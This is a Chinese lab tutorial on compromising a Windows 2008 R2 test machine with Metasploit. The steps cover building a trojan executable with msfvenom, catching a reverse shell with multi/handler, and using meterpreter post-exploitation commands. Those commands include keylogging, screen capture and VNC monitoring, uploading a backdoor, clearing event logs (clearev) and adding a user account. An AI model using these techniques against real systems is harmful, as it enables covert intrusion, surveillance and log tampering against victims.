msf rhosts设置文件_MSF入侵Windows之实战

最新推荐文章于 2023-07-30 10:44:49 发布
最新推荐文章于 2023-07-30 10:44:49 发布
阅读量634 收藏 2
点赞数
文章标签: msf rhosts设置文件 msf实战提权windows

原理:

  利用msf模块中的msfvenom模块,生成123.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。

准备:

  靶机:windows 2008 r2  

  ip:192.168.100.20

  攻击主机:kali         

  ip:192.168.100.21

实战:

1、     查看攻击主机ip

84e5f0df90c7ea3b2c27c1bc48c65699.png

2、     生成123.exe木马文件

f1a447ac2aa2fc5dc8f9adc44002c9c5.png

3、     将制作好的木马文件放到目标机内

22cd65ec2374298d3e8d602c5032f4d5.png

4、     启动msfconsole进入msf

9c7d9ea17360e6ac57184d641568c9d3.png

5、     加载exploit/multi/handler,设置payload反弹,设置LHOS反弹地址

9a0d2c2f3bde7d7730ac7fc6bb5499cb.png

6、     show options查看所设置的内容

10d1c24f12babae202141b0276f2d74c.png

7、     设置好后,直接exploit,开始攻击,等待目标靶机中招

8fed04b2a782e3da26c6facdf6c5c4d2.png

8、     当靶机中招后,获得反弹shell,渗透成功

1b1029f288843b70e273aa171452a4eb.png

9、     此时我们就可以对靶机进行操作了

936b40039c55a16086461d5b927b65a5.png

10、     如果出现了乱码现象,这是编码的问题,在终端->修改编码->改成中文的GBK退出再次shell即可解决

ce28eb040e72e682fb5683abcfeb2bf1.png

11、     meterpreter下的部分命令总结:

getwd当前目录

0f3f2df4647df3bce1bd89da63a733ff.png

dir查看所有文件

0b488acee5e2417becbdfb8c1b709336.png

cat111.txt 查看文件111.txt内容

97c2d5bad4923b6d98109fbc35296434.png

search-f cmd.exe (搜索名为123.exe文件所在目录)

1d9c2ba3e94419f7b62cfc0247ad493a.png

upload/root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件

d1d19caabcdfca86ab06c46c30b26799.png

downloadc:\123txt /root 下载文件

a2cad9424ffb574c67a569ab3f0a67a6.png

e16152eb0b337ac4423905929236fb68.png

clearev清除日志

f0a419a08112bf5e9e8eee7a1cfcb00d.png

getuid当前用户

609117e4ad22c37d70c04eca8b114c6d.png

ps 查看所用进程

0d8813d6a142d1b8e7c854b8f8a00831.png

sysinfo系统信息

a3a44a364d3e254eb47bbcdba58b139b.png

keyscan_start开始键盘记录

keyscan_stop停止键盘记录

keyscan_dump查看结果

f4702d3c37fefb6f7f984fb7c7f09943.png

屏幕截图

screenshot

2f666e1a2221c1d63c54ca17e1116039.png

49e46bae6e30b9865518a74e1a4c51e9.png

屏幕监控

runvnc

316c4f92347deae00ca58194227fb4e1.png

6d945716ff0c687093808203fd0631a0.png

shell

获取shell,进入cmd

26f7314b26109bb9d88a8c3f4c07a7c9.png

netuser 用户名 密码 /add 添加用户(jeff/Abc!23)

644d9e0fcef8a22a2a7ee5a6be2e3282.png

netuser 用户名 密码 更改用户密码(jeff/ABc!@3)

15b88f52ee432542c26dd80c18ce9f12.png

最后,本次实验仅是仅供实验,切勿用于实战,否则后果自负!

weixin_39556891
关注
MSF搭建socks代理
谢公子的博客
05-01 7835
目录 搭建代理 添加路由 ​搭建Socks4a代理 搭建Socks5代理 连接代理 搭建代理 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。 MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。我们一般用socks4a和socks5进行代理。socks5可以设置用户名和密码。这里运行代理后,有时候MSF不会监听端口...
msf rhosts设置文件_内网渗透-msf基本使用及添加路由(跳板)
weixin_39544333的博客
11-28 1846
介绍MSF(Metasploit)是一款开源安全漏洞检测工具,附带上千个已知漏洞的exp,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。使用msf中内置的payload、module、shellcode、listener等功能,结合自己开发的脚本,可进行渗透以及内网域渗透。常用命令show exploits – 查看所有可用的渗透攻击程序代码 show auxilia...
msf rhosts设置文件_msf系列之大牛黑客必须学的控制台命令
weixin_39825322的博客
11-06 1016
1、 Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集...
msf rhosts设置文件_windows下打造漂亮的msf
weixin_39657575的博客
11-25 277
windows安装kali子系统首先需要在windows下安装kali子系统。打开windows设置,选择更新和安全 ====> 开发者选项,选择开发人员模式。接着打开控制面板 ====> 程序 ====> 启用或关闭Windows功能,勾选适用于Linux的Windows子系统然后打开Microsoft Store 搜索 kali 或者 ubuntu都可以安装完成后会...
hosts.equiv和.rhosts文件(转)
congjukun0600的博客
08-09 376
hosts.equiv和.rhosts文件(转)[@more@]cloudsky (晓舟·轩辕明月)远程用户启动rlogin访问你的本地主机,此时做如下安全性检查:1. 本地rlogind在本地/etc/passwd文件中寻找远...
msf rhosts设置
06-10
`msf rhosts` 是 Metasploit 框架中用于设置目标主机 IP 地址的命令。它用于指定要攻击的主机或网络的 IP 地址范围。下面是 `msf rhosts` 的使用示例: 单个目标主机: ``` msf > set rhosts 192.168.1.100 ``` ...
kali 使用 msf通过sm17_010漏洞拿到Windows shell
最新发布
kk的博客
07-30 490
3、找到msf的工具目录,进入smb_ms17_101漏洞利用模块,使用search ms17_010查看可用模块、使用show optionsc查看可支持命令与参数。1、nessus扫描目标系统的IP拿到系统漏洞信息(存在ms11_030、ms17_010、ms16_047漏洞),本教程以ms17_010为例讲解。serach vce:VCE-2017-8464 type:exploit # 查找漏洞VCE-2017-8464的利用方法与模块。modules:存储metasploit的模块文件
msf rhosts如何设置多个ip地址
06-09
如果您想在msf中使用rhosts模块扫描多个IP地址,可以按照以下步骤操作: 1. 打开msf控制台,并输入以下命令以使用rhosts模块: ``` use auxiliary/scanner/portscan/tcp ``` 2. 设置扫描的IP地址范围,例如: ...
msf rhosts设置文件_聊一聊基于 msf 的免杀项目测试过程
weixin_39990819的博客
11-27 524
本文作者:ven0m(信安之路红蓝对抗小组成员)招新文章:信安之路红蓝对抗小组招募志同道合的朋友我们在渗透中,需要解决的两个主要问题,一个是过安全检测设备(俗称过 WAF),一个是过杀毒软件(免杀);免杀又分为脚本免杀(PHP, JSP, ASP 等)和二进制免杀,今天主要是来总结一下常见的 MSF 免杀工具的使用方法以及对比一下免杀效果。在这里我选了三款比较典型的杀毒软件,也是国内用的...
hosts文件
Sqrt1230的博客
11-04 3923
hosts文件 前面我们讲解了DNS域名解析的流程以及原理(详见DNS解析),可以了解到DNS服务器最大的作用便是存储着域名到IP地址的映射,以便用户在通过浏览器请求某个页面时,将用户输入的域名解析为对应的IP地址。 接下来我们通过一次域名解析的完整流程来认识hosts文件(下图是一次域名解析的完整过程,对[MY PC]框图以外不理解的可以参考DNS解析) 接下来我们对上图进行一个较为深刻的解读 假定我们在请求www.oracle.com站点 当我们在浏览器导航栏输入一条域名并按下回车时,域名解析的过程
~/.rhosts文件和/etc/hosts.equiv的关系
热带雨林
05-31 7327
<br />如果是要root用户能够在rlogin时不输入密码(即建立信任机制)的话就要在.rhosts文件中加入对方hostname<br />而普通用户要建立信任机制只要在/etc/hosts.equiv中加入对方的hostname就可以了<br /><br /><br />简单的说hosts.equiv是不同主机间的信任关系,.rhosts是同一用户在不同主机间的信任。<br /><br />host.equiv信任被信主机的所有用户,<br />.hosts 只信任被信主机的相应的某个用户<br /
~/.rhosts文件和/etc/hosts.equiv的关系(2) 实现例
热带雨林
05-31 2734
<br />你可以有两种方法实现r命令,一是基于主机信任,另一种是基于主机加用户信任。<br /> <br />对基于主机信任方式较简单,假设LAN上有两台机器sh3和shopu,两台机器<br />上都有帐号jephe,你可以在sh3上设置/etc/hosts.equiv, login as root,<br />创建/etc/hosts.equiv,包含象下面的一行:<br />[root@sh3 /etc]# more hosts.equiv<br />shopu <br />[root@sh3 /e
msf rhosts设置文件_利用MSF检测CVE20190708漏洞
weixin_39737224的博客
11-28 584
CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。GitHub项目:https://github.com/zerosum0x0/CVE-2019-0708MSF模块:ht...
msf rhosts设置文件_msf之CVE20190708Bluekeep漏洞利用模块
weixin_39625864的博客
11-28 479
msf之CVE-2019-0708-Bluekeep漏洞利用模块漏洞介绍2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年Wan...
msf的命令
zhoufeisi的博客
04-02 321
use 使用模块攻击 set rhosts 设置被攻击方的IP地址 setg rhosts 设置全局变量然后再用save用来保存全局变量它会写进一个新的文件在下次使用时直接调用不用的时候可以用unsetg rhosts 删除 如果是局部变量可以使用unset删除 一般我们找攻击模块的时候可以用search 加 关键词 搜索 back 退出模块 exit退出 clear 清屏 ...
MSF渗透测试
weixin_51646864的博客
08-12 1175
MSF入门实验
系统测试,文件权限问题解决
weixin_46010646的博客
11-11 257
系统测试,文件权限问题解决
MSFConsole 学习记录
AaronLuo
10-24 1255
MSF官方链接,在这里可以获得官方文档及其他帮助 介绍 Rex 基本功能库,用于完成日常基本任务,无需人工手动编码实现 完成socket连接访问,协议应答(http/ssl/smb等) 编码转换(XOR,BASE64,Unicode) Msf::core 提供Msf的核心基本API,是框架核心能力实现库 Msf:: Base 提供友好的API,便于模块调用的库 Plugin 插...
Metasploit(MSF)渗透测试框架使用教程及基本命令
qq_44433172的博客
05-30 4014
第一章 Metasploit渗透框架介绍及体系框架 1.1 Metasploit 渗透测试框架介绍   Metasploit 是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。使您能够查找,利用和验证漏洞。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具开发平台。 1.2 Metasploit 体系框架  模块:模块组织按照不同的用途分为6种类型的模块 分为辅助模块(Aux)、渗透攻击模块(Exploits)、后渗透攻击模块(Post)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值